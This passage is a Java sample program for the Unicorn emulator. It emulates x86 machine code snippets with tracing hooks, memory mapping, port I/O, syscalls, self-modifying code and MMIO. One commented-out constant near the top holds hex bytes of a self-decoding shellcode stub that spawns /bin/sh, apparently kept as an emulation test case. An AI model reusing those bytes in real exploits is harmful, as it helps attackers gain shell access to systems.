*/ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to demonstrate how to emulate X86 code */ package samples; import java.math.BigInteger; import java.nio.ByteBuffer; import unicorn.*; public class Sample_x86 implements UnicornConst, X86Const { /** code to be emulated * {@code INC ecx; DEC edx; PXOR xmm0, xmm1} */ private static final byte[] X86_CODE32 = Utils.hexToBytes("414a660fefc1"); /** code to be emulated * {@code jmp 4; nop; nop; nop; nop; nop; nop} */ private static final byte[] X86_CODE32_JUMP = Utils.hexToBytes("eb02909090909090"); // private static final byte[] X86_CODE32_SELF = Utils.hexToBytes("eb1c5a89d68b02663dca7d7506660503038902fec23d4141414175e9ffe6e8dfffffff31d26a0b589952682f2f7368682f62696e89e3525389e1ca7d41414141"); /** code to be emulated * {@code PUSH ecx; PUSH ecx; PUSH ecx; PUSH ecx} */ // private static final byte[] X86_CODE32 = Utils.hexToBytes("51515151"); /** code to be emulated * {@code INC ecx; DEC edx; self_loop: JMP self_loop} */ private static final byte[] X86_CODE32_LOOP = Utils.hexToBytes("414aebfe"); /** code to be emulated * {@code mov [0xaaaaaaaa], ecx; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_MEM_WRITE = Utils.hexToBytes("890DAAAAAAAA414a"); /** code to be emulated * {@code mov ecx, [0xaaaaaaaa]; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_MEM_READ = Utils.hexToBytes("8B0DAAAAAAAA414a"); /** code to be emulated * {@code inc eax; mov ebx, [0x100000]; inc edx} */ private static final byte[] X86_CODE32_MEM_READ_IN_TB = Utils.hexToBytes("408b1d0000100042"); /** code to be emulated * {@code JMP outside; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_JMP_INVALID = Utils.hexToBytes("e9e9eeeeee414a"); /** code to be emulated * {@code INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx} */ private static final byte[] X86_CODE32_INOUT = Utils.hexToBytes("41E43F4aE64643"); /** code to be emulated * {@code INC eax} */ private static final byte[] X86_CODE32_INC = Utils.hexToBytes("40"); //private static final byte[] X86_CODE64 = Utils.hexToBytes("41BC3BB0282A490FC9904D0FADCF4987FD904881D28ACE773548F7D9"); // <== still crash /** code to be emulated */ private static final byte[] X86_CODE64 = Utils.hexToBytes("41BC3BB0282A490FC9904D0FADCF4987FD90" + "4881D28ACE773548F7D94D29F44981C9F68A" + "C6534D87ED480FADD249F7D448F7E14D19C5" + "4D89C548F7D641B84F8D6B594D87D0686A1E" + "093C59"); /** code to be emulated * {@code add byte ptr [bx + si], al} */ private static final byte[] X86_CODE16 = Utils.hexToBytes("0000"); /** code to be emulated * {@code syscall} */ private static final byte[] X86_CODE64_SYSCALL = Utils.hexToBytes("0f05"); /** code to be emulated * {@code mov [0x20004], ecx; mov ecx, [0x20004]} */ private static final byte[] X86_MMIO_CODE = Utils.hexToBytes("890d040002008b0d04000200"); /** code to be emulated *
     * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6
     * 0x1003 dw 0x3ea98b13
     * 
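     * <p>(The first instruction xors the dword at 0x1003 with eax, so the
     * bytes after it are rewritten before they are fetched and executed:
     * classic self-modifying code.)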
*/ private static final byte[] X86_CODE32_SMC = Utils.hexToBytes("314703138ba93e"); /** memory address where emulation starts */ public static final int ADDRESS = 0x1000000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); long eflags = uc.reg_read(UC_X86_REG_EFLAGS); System.out.format(">>> --- EFLAGS is 0x%x\n", eflags); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc.emu_stop(); }; private static final CodeHook hook_code64 = (uc, address, size, user_data) -> { long rip = uc.reg_read(UC_X86_REG_RIP); System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); System.out.format(">>> RIP is 0x%x\n", rip); }; private static final EventMemHook hook_mem_invalid = (uc, type, address, size, value, user) -> { switch (type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_WRITE_UNMAPPED: System.out.printf( ">>> Missing memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", address, size, value); // map this memory in with 2MB in size uc.mem_map(0xaaaa0000L, 2 * 1024 * 1024, UC_PROT_ALL); // return true to indicate we want to continue return true; } }; private static final MemHook hook_mem64 = (uc, type, address, size, value, user_data) -> { switch (type) { default: break; case UC_MEM_READ: System.out.format( ">>> Memory is being READ at 0x%x, data size = %d\n", address, size); break; case UC_MEM_WRITE: System.out.format( ">>> Memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", address, size, value); break; } }; // callback for IN instruction (X86). // this returns the data read from the port private static final InHook hook_in = (uc, port, size, user) -> { long r_eip = uc.reg_read(UC_X86_REG_EIP); System.out.printf( "--- reading from port 0x%x, size: %d, address: 0x%x\n", port, size, r_eip); switch (size) { case 1: // read 1 byte to AL return 0xf1; case 2: // read 2 byte to AX return 0xf2; case 4: // read 4 byte to EAX return 0xf4; } return 0; }; // callback for OUT instruction (X86). private static final OutHook hook_out = (uc, port, size, value, user) -> { long eip = uc.reg_read(UC_X86_REG_EIP); long tmp = 0; System.out.printf( "--- writing to port 0x%x, size: %d, value: 0x%x, address: 0x%x\n", port, size, value, eip); // confirm that value is indeed the value of AL/AX/EAX switch (size) { default: return; // should never reach this case 1: tmp = uc.reg_read(UC_X86_REG_AL); break; case 2: tmp = uc.reg_read(UC_X86_REG_AX); break; case 4: tmp = uc.reg_read(UC_X86_REG_EAX); break; } System.out.printf("--- register value = 0x%x\n", tmp); }; // callback for SYSCALL instruction (X86). 
private static final SyscallHook hook_syscall = (uc, user_data) -> { long rax = uc.reg_read(UC_X86_REG_RAX); if (rax == 0x100) { rax = 0x200; uc.reg_write(UC_X86_REG_RAX, rax); } else { System.out.format("ERROR: was not expecting rax=0x%x in syscall\n", rax); } }; private static final EventMemHook hook_memalloc = (uc, type, address, size, value, user_data) -> { long aligned_address = address & ~(0xFFFL); int aligned_size = ((int) (size / 0x1000) + 1) * 0x1000; System.out.format( ">>> Allocating block at 0x%x (0x%x), block size = 0x%x (0x%x)\n", address, aligned_address, size, aligned_size); uc.mem_map(aligned_address, aligned_size, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(aligned_address, X86_CODE32); // this recovers from missing memory, so we return true return true; }; public static void test_miss_code() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code - missing code"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // auto-allocate memory on access uc.hook_add(hook_memalloc, UC_HOOK_MEM_UNMAPPED, 1, 0, null); // emulate machine code, without having the code in yet uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } public static void test_i386() { int tmp; long r_ecx = 0x1234; // ECX register long r_edx = 0x7890; // EDX register // XMM0 and XMM1 registers, low qword then high qword BigInteger r_xmm0 = new BigInteger("000102030405060708090a0b0c0d0e0f", 16); BigInteger r_xmm1 = new BigInteger("00102030405060708090a0b0c0d0e0f0", 16); System.out.println("Emulate i386 code"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); uc.reg_write(UC_X86_REG_XMM0, r_xmm0); uc.reg_write(UC_X86_REG_XMM1, r_xmm1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); r_ecx = uc.reg_read(UC_X86_REG_ECX); r_edx = uc.reg_read(UC_X86_REG_EDX); r_xmm0 = (BigInteger) uc.reg_read(UC_X86_REG_XMM0, null); System.out.format(">>> ECX = 0x%x\n", r_ecx); System.out.format(">>> EDX = 0x%x\n", r_edx); String xmm0_string = String.format("%32s", r_xmm0.toString(16)).replace(' ', '0'); System.out.format(">>> XMM0 = 0x%s\n", xmm0_string); // read from memory tmp = Utils.toInt(uc.mem_read(ADDRESS, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); } public static void test_i386_map_ptr() { int tmp; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code - use uc_mem_map_ptr()"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // malloc 2MB memory for this emulation ByteBuffer mem = ByteBuffer.allocateDirect(2 * 1024 * 1024); uc.mem_map_ptr(ADDRESS, mem, UC_PROT_ALL); mem.put(X86_CODE32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); // read from memory tmp = Utils.toInt(uc.mem_read(ADDRESS, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); } public static void test_i386_jump() { System.out.println("Emulate i386 code with jump"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_JUMP); // tracing 1 basic block with customized callback uc.hook_add(hook_block, ADDRESS, ADDRESS, null); // tracing 1 instruction at ADDRESS uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_JUMP.length, 0, 0); System.out.println(">>> Emulation done. Below is the CPU context"); } // emulate code that loop forever public static void test_i386_loop() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that loop forever"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_LOOP); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.length, 2 * UC_SECOND_SCALE, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } // emulate code that read invalid memory public static void test_i386_invalid_mem_read() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that read from invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_READ); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); throw new RuntimeException("Expected a crash!"); } catch (UnicornException e) { System.out.println("uc.emu_start failed as expected: " + e); } // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } // emulate code that write invalid memory public static void test_i386_invalid_mem_write() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register int tmp; System.out.println("Emulate i386 code that write to invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // intercept invalid memory events uc.hook_add(hook_mem_invalid, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); // read from memory tmp = Utils.toInt(uc.mem_read(0xaaaaaaaaL, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, tmp); try { tmp = Utils.toInt(uc.mem_read(0xffffffaaL, 4)); throw new RuntimeException("Expected mem_read to fail"); } catch (UnicornException e) { System.out.format(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); } } // emulate code that jump to invalid memory public static void test_i386_jump_invalid() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that jumps to invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_JMP_INVALID); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_JMP_INVALID.length, 0, 0); throw new RuntimeException("Expected a crash!"); } catch (UnicornException e) { System.out.println("uc.emu_start failed as expected: " + e); } // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } public static void test_i386_inout() { int r_eax = 0x1234; // EAX register int r_ecx = 0x6789; // ECX register System.out.println("Emulate i386 code with IN/OUT instructions"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_INOUT); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); uc.reg_write(UC_X86_REG_ECX, r_ecx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions uc.hook_add(hook_code, 1, 0, null); // uc IN instruction uc.hook_add(hook_in, null); // uc OUT instruction uc.hook_add(hook_out, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); } // emulate code and save/restore the CPU context public static void test_i386_context_save() { int r_eax = 0x1; // EAX register System.out.println("Save/restore CPU context in opaque blob"); // initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 8KB memory for this emulation uc.mem_map(ADDRESS, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_INC); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); // emulate machine code in infinite time System.out.println(">>> Running emulation for the first time"); uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INC.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // allocate and save the CPU context System.out.println(">>> Saving CPU context"); Unicorn.Context context = uc.context_save(); // emulate machine code again System.out.println(">>> Running emulation for the second time"); uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INC.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // restore CPU context uc.context_restore(context); // now print out some registers System.out .println(">>> CPU context restored. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // modify some registers of the context context.reg_write(UC_X86_REG_EAX, 0xc8); // and restore CPU context again uc.context_restore(context); // now print out some registers System.out.format( ">>> CPU context restored with modification. 
Below is the CPU context\n"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); } public static void test_x86_64() { long rax = 0x71f3029efd49d41dL; long rbx = 0xd87b45277f133ddbL; long rcx = 0xab40d1ffd8afc461L; long rdx = 0x919317b4a733f01L; long rsi = 0x4c24e753a17ea358L; long rdi = 0xe509a57d2571ce96L; long r8 = 0xea5b108cc2b9ab1fL; long r9 = 0x19ec097c8eb618c1L; long r10 = 0xec45774f00c5f682L; long r11 = 0xe17e9dbec8c074aaL; long r12 = 0x80f86a8dc0f6d457L; long r13 = 0x48288ca5671c5492L; long r14 = 0x595f72f6e4017f6eL; long r15 = 0x1efd97aea331ccccL; long rsp = ADDRESS + 0x200000L; System.out.println("Emulate x86_64 code"); // Initialize emulator in X86-64bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE64); // initialize machine registers uc.reg_write(UC_X86_REG_RSP, rsp); uc.reg_write(UC_X86_REG_RAX, rax); uc.reg_write(UC_X86_REG_RBX, rbx); uc.reg_write(UC_X86_REG_RCX, rcx); uc.reg_write(UC_X86_REG_RDX, rdx); uc.reg_write(UC_X86_REG_RSI, rsi); uc.reg_write(UC_X86_REG_RDI, rdi); uc.reg_write(UC_X86_REG_R8, r8); uc.reg_write(UC_X86_REG_R9, r9); uc.reg_write(UC_X86_REG_R10, r10); uc.reg_write(UC_X86_REG_R11, r11); uc.reg_write(UC_X86_REG_R12, r12); uc.reg_write(UC_X86_REG_R13, r13); uc.reg_write(UC_X86_REG_R14, r14); uc.reg_write(UC_X86_REG_R15, r15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions in the range [ADDRESS, ADDRESS+20] uc.hook_add(hook_code64, ADDRESS, ADDRESS + 20, null); // tracing all memory WRITE access (with @begin > @end) uc.hook_add(hook_mem64, UC_HOOK_MEM_WRITE, 1, 0, null); // tracing all memory READ access (with @begin > @end) uc.hook_add(hook_mem64, UC_HOOK_MEM_READ, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + X86_CODE64.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.format(">>> RAX = 0x%x\n", uc.reg_read(UC_X86_REG_RAX)); System.out.format(">>> RBX = 0x%x\n", uc.reg_read(UC_X86_REG_RBX)); System.out.format(">>> RCX = 0x%x\n", uc.reg_read(UC_X86_REG_RCX)); System.out.format(">>> RDX = 0x%x\n", uc.reg_read(UC_X86_REG_RDX)); System.out.format(">>> RSI = 0x%x\n", uc.reg_read(UC_X86_REG_RSI)); System.out.format(">>> RDI = 0x%x\n", uc.reg_read(UC_X86_REG_RDI)); System.out.format(">>> R8 = 0x%x\n", uc.reg_read(UC_X86_REG_R8)); System.out.format(">>> R9 = 0x%x\n", uc.reg_read(UC_X86_REG_R9)); System.out.format(">>> R10 = 0x%x\n", uc.reg_read(UC_X86_REG_R10)); System.out.format(">>> R11 = 0x%x\n", uc.reg_read(UC_X86_REG_R11)); System.out.format(">>> R12 = 0x%x\n", uc.reg_read(UC_X86_REG_R12)); System.out.format(">>> R13 = 0x%x\n", uc.reg_read(UC_X86_REG_R13)); System.out.format(">>> R14 = 0x%x\n", uc.reg_read(UC_X86_REG_R14)); System.out.format(">>> R15 = 0x%x\n", uc.reg_read(UC_X86_REG_R15)); } public static void test_x86_64_syscall() { long rax = 0x100; System.out.println("Emulate x86_64 code with 'syscall' instruction"); // Initialize emulator in X86-64bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE64_SYSCALL); // hook interrupts for syscall uc.hook_add(hook_syscall, UC_X86_INS_SYSCALL, 1, 0, null); // initialize machine registers uc.reg_write(UC_X86_REG_RAX, rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> RAX = 0x%x\n", uc.reg_read(UC_X86_REG_RAX)); } public static void test_x86_16() { int eax = 7; int ebx = 5; int esi = 6; System.out.println("Emulate x86 16-bit code"); // Initialize emulator in X86-16bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_16); // map 8KB memory for this emulation uc.mem_map(0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(0, X86_CODE16); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, eax); uc.reg_write(UC_X86_REG_EBX, ebx); uc.reg_write(UC_X86_REG_ESI, esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(0, X86_CODE16.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); // read from memory byte[] result = uc.mem_read(11, 1); System.out.format(">>> Read 1 bytes from [0x%x] = 0x%x\n", 11, result[0] & 0xff); } public static void test_i386_invalid_mem_read_in_tb() { int r_eax = 0x1234; // EAX register int r_edx = 0x7890; // EDX register System.out.format( "Emulate i386 code that read invalid memory in the middle of a TB\n"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_READ_IN_TB); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); uc.reg_write(UC_X86_REG_EDX, r_edx); // Add a dummy callback. // Note: if this callback is not added, the EIP will not be updated, // and EIP will read as ADDRESS after emu_start fails. 
uc.hook_add((MemHook) (u, type, address, size, value, user) -> { }, UC_HOOK_MEM_READ, 1, 0, null); // Let it crash by design. try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ_IN_TB.length, 0, 0); throw new RuntimeException("Expected uc.emu_start to fail"); } catch (UnicornException e) { System.out.println( "uc.emu_start() failed BY DESIGN with error returned: " + e); } System.out.println(">>> Emulation done. Below is the CPU context"); long r_eip = uc.reg_read(UC_X86_REG_EIP); System.out.format(">>> EIP = 0x%x\n", r_eip); if (r_eip != ADDRESS + 1) { System.out.format( ">>> ERROR: Wrong PC 0x%x when reading unmapped memory in the middle of TB!\n", r_eip); } else { System.out.format( ">>> The PC is correct after reading unmapped memory in the middle of TB.\n"); } } public static void test_i386_smc_xor() { long r_edi = ADDRESS; // EDI register long r_eax = 0xbc4177e6L; // EAX register System.out.println("Emulate i386 code that modfies itself"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 4KB memory for this emulation uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_SMC); // initialize machine registers uc.reg_write(UC_X86_REG_EDI, r_edi); uc.reg_write(UC_X86_REG_EAX, r_eax); // **Important Note** // // Since SMC code will cause TB regeneration, the XOR would in fact be // executed twice (the first execution won't take effect). Thus, if you // would like to use count to control the emulation, the count should be // set to 2. // // uc.emu_start(ADDRESS, ADDRESS + 3, 0, 0); uc.emu_start(ADDRESS, 0, 0, 2); System.out.println(">>> Emulation done. Below is the result."); int result = Utils.toInt(uc.mem_read(ADDRESS + 3, 4)); if (result == (0x3ea98b13 ^ 0xbc4177e6)) { System.out.format( ">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } else { System.out.format( ">>> SMC emulation is wrong. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } } private static final MmioReadHandler mmio_read_callback = (uc, offset, size, user_data) -> { System.out.format( ">>> Read IO memory at offset 0x%d with 0x%d bytes and return 0x19260817\n", offset, size); // The value returned here will be written to ecx. return 0x19260817; }; private static final MmioWriteHandler mmio_write_callback = (uc, offset, size, value, user_data) -> { System.out.format( ">>> Write value 0x%d to IO memory at offset 0x%d with 0x%d bytes\n", value, offset, size); }; public static void test_i386_mmio() { long r_ecx = 0xdeadbeefL; System.out.println("Emulate i386 code that uses MMIO"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 4KB memory for this emulation uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_MMIO_CODE); uc.mmio_map(0x20000, 0x4000, mmio_read_callback, null, mmio_write_callback, null); // prepare ecx uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.emu_start(ADDRESS, ADDRESS + X86_MMIO_CODE.length, 0, 0); System.out.format(">>> Emulation done. 
ECX=0x%x\n", uc.reg_read(UC_X86_REG_ECX)); } private static final EventMemHook test_i386_hook_mem_invalid_cb = (uc, type, address, size, value, user_data) -> { if (type == UC_MEM_READ_UNMAPPED || type == UC_MEM_WRITE_UNMAPPED) { System.out.format( ">>> We have to add a map at 0x%x before continue execution!\n", address); uc.mem_map(address, 0x1000, UC_PROT_ALL); } // If you really would like to continue the execution, make sure the memory // is already mapped properly! return true; }; public static void test_i386_hook_mem_invalid() { // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; byte[] code = Utils.hexToBytes("b8efbeaddea300800000a100000100"); System.out.println( "Emulate i386 code that triggers invalid memory read/write."); Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); uc.mem_write(ADDRESS, code); long hook = uc.hook_add(test_i386_hook_mem_invalid_cb, UC_HOOK_MEM_INVALID, 1, 0, null); uc.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); uc.hook_del(hook); } public static void main(String args[]) { if (args.length == 1) { if (args[0].equals("-16")) { test_x86_16(); } else if (args[0].equals("-32")) { test_miss_code(); System.out.println("==================================="); test_i386(); System.out.println("==================================="); test_i386_map_ptr(); System.out.println("==================================="); test_i386_inout(); System.out.println("==================================="); test_i386_context_save(); System.out.println("==================================="); test_i386_jump(); System.out.println("==================================="); test_i386_loop(); System.out.println("==================================="); test_i386_invalid_mem_read(); System.out.println("==================================="); test_i386_invalid_mem_write(); System.out.println("==================================="); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); } else if (args[0].equals("-64")) { test_x86_64(); System.out.println("==================================="); test_x86_64_syscall(); } else if (args[0].equals("-h")) { System.out.println( "Syntax: java samples.Sample_x86 <-16|-32|-64>"); } } else { test_x86_16(); System.out.println("==================================="); test_miss_code(); System.out.println("==================================="); test_i386(); System.out.println("==================================="); test_i386_map_ptr(); System.out.println("==================================="); test_i386_inout(); System.out.println("==================================="); test_i386_context_save(); System.out.println("==================================="); 